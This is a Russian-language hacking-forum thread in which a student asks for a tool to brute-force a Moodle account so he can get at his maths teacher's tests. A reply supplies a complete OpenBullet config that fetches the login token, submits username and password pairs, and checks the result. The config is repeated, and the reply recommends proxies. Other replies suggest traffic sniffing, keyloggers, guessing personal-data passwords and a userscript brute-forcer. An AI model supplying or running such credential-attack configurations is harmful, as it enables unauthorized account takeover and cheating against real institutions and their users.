Артемий Закамянелый
New member
Достала эта математичка, хз откуда берет свои тесты. А на этом *сайте* никакой капчи нифига, хоть целое столетие пробуй заходить с одним логином.
-
B правой части каждого сообщения есть стрелки ⇧ и ⇩. Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок ✔ в правой части сообщения.
-
15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby
За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.
На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.
Запись на курс до 25 апреля. Получить промодоступ ...
Подскажите софтину для брута учетки на сайте на Moodle.
- Автор темы Артемий Закамянелый
- Дата начала
-
- Теги
- brute force moodle
Скачиваешь OpenBullet вставляешь конфиг:
Прокси по желанию можно взять
P.S. Конфиг пишется минут пять на любой сайт )
P.P.S. В конфиге убери * в URL
REQUEST GET "https*://moodle.org/*login/index.php"
HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
HEADER "Pragma: no-cache"
HEADER "Accept: */*"
PARSE "<SOURCE>" LR "logintoken\" value=\"" "\">" -> VAR "token"
REQUEST POST "https*://moodle.org/*login/index.php"
CONTENT "anchor=&logintoken=<token>&username=<USERNAME>&password=<PASSWORD>"
CONTENTTYPE "application/x-www-form-urlencoded"
HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
HEADER "Pragma: no-cache"
HEADER "Accept: */*"
KEYCHECK
KEYCHAIN Success OR
KEY "Выход"
KEYCHAIN Failure OR
KEY "Invalid login, please try again"
HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
HEADER "Pragma: no-cache"
HEADER "Accept: */*"
PARSE "<SOURCE>" LR "logintoken\" value=\"" "\">" -> VAR "token"
REQUEST POST "https*://moodle.org/*login/index.php"
CONTENT "anchor=&logintoken=<token>&username=<USERNAME>&password=<PASSWORD>"
CONTENTTYPE "application/x-www-form-urlencoded"
HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
HEADER "Pragma: no-cache"
HEADER "Accept: */*"
KEYCHECK
KEYCHAIN Success OR
KEY "Выход"
KEYCHAIN Failure OR
KEY "Invalid login, please try again"
Прокси по желанию можно взять
Ссылка скрыта от гостей
или
Ссылка скрыта от гостей
P.S. Конфиг пишется минут пять на любой сайт )
P.P.S. В конфиге убери * в URL
Последнее редактирование:
Проще снифать трафик или кейлогеры делать.
Хотя по опыту скажу, что хорошие пороли только админ и сетевик ставили, все остальные значимые пароли. Фамилии, дата, девичия фамилия и etc.
Брут можно хоть на javascripte написать в violantmonkey. Там один запрос и прокси.
Хотя по опыту скажу, что хорошие пороли только админ и сетевик ставили, все остальные значимые пароли. Фамилии, дата, девичия фамилия и etc.
Брут можно хоть на javascripte написать в violantmonkey. Там один запрос и прокси.
Щербак Щербак
New member
Так , а для тупых можно такойже но с уже извесным логином и просто подбор паролей?
Обучение наступательной кибербезопасности в игровой форме. Начать игру!